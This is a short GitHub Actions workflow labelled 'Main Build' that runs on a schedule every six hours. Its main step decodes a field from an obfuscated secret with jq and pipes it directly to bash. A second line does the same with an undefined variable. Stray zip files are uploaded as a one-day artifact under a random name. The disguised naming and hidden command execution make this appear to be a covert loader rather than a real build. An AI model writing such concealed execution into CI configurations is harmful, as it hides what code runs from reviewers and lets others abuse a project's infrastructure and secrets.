name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '48 1,7,13,19 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          sfmq96484: ${{ secrets.sfmq96484 }}
        run: |
          printf '%s' "$sfmq96484" | jq -r .uee55678 | /bin/bash
          printf '%s' "$wckgy2" | jq -r .z2506 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: J67bujRe
          path: "*.zip"
          retention-days: 1
